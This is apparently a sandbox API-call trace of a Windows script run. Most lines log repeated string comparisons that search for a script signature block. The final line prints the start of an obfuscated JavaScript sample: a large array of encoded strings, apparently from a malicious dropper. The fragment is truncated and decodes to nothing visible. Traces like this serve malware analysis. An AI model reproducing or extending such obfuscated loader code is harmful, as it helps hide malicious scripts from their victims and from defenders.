	[0119.716] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0119.716] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.716] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.716] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0119.716] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0119.716] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0119.716] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0119.716] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0119.716] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0119.716] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.716] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0119.716] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.716] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0119.716] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0119.716] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.716] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.716] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0119.716] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0119.717] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0119.717] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0119.717] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0119.717] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.717] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0119.717] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.717] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0119.717] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.717] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.717] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0119.717] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0119.717] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0119.717] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0119.717] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0119.717] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0119.717] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0119.717] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0119.717] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0119.717] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0119.717] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0119.717] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0119.717] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.717] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.717] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0119.717] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0119.717] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.717] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.717] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0119.717] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.717] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0119.717] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.717] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0119.717] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0119.717] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0119.717] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0119.717] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.717] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0119.717] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0119.717] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.718] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0119.718] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0119.718] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0119.718] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0119.718] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0119.718] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0119.718] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0119.718] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0119.718] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0119.718] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0119.718] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0119.718] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0119.718] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.718] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0119.718] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.718] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.718] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0119.718] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0119.718] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.718] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0119.718] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.718] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0119.718] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0119.718] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.718] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0119.718] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0119.718] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.718] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0119.718] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0119.718] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0119.718] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0119.718] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0119.718] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0119.718] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0119.718] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0119.718] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.718] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0119.718] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0119.718] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.719] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0119.719] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0119.719] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.719] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0119.719] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0119.719] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0119.719] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0119.719] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0119.719] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0119.719] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.719] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.719] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0119.719] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0119.719] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0119.719] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0119.719] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0119.719] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0119.719] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.719] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0119.719] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0119.719] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0119.719] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0119.719] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.719] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0119.719] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0119.719] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0119.719] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0119.719] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0119.719] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0119.719] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0119.719] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0119.719] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0119.719] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0119.719] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0119.719] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0119.722] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0119.722] CloseCodeAuthzLevel () returned 0x1
	[0119.722] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0119.722] ??2@YAPEAX_K@Z () returned 0x2f3f0
	[0119.723] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj